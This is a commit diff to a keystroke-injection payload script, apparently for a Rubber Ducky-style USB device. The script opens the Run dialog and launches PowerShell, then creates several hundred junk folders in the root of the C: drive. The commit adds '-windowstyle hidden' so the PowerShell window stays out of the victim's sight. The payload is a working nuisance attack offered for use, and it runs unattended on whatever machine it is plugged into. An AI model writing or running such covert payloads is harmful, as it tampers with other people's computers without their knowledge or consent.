Update create folders in C.txt
This commit is contained in:
@@ -4,7 +4,7 @@ REM Version: 1.0
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
STRING powershell -windowstyle hidden
|
||||
ENTER
|
||||
DELAY 900
|
||||
STRING (1..300) | % {new-item -type directory -path "C:\_331232ADA-$_"}
|
||||
@@ -14,4 +14,4 @@ STRING (1..200) | % {new-item -type directory -path "C:\fdsA$_AAA$_"}
|
||||
ENTER
|
||||
DELAY 4000
|
||||
STRING (1..200) | % {new-item -type directory -path "C:\_$_"}
|
||||
ENTER
|
||||
ENTER
|
||||
|
||||
Reference in New Issue
Block a user